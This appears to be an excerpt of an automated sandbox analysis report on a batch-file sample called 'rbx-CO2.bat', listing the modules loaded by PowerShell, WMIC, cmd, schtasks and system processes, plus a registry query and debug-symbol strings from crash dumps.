Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: rbx-CO2.bat Static file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbSystem.DirectoryServices.dll source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.pdbp}Y source: WER6AC3.tmp.dmp.11.dr
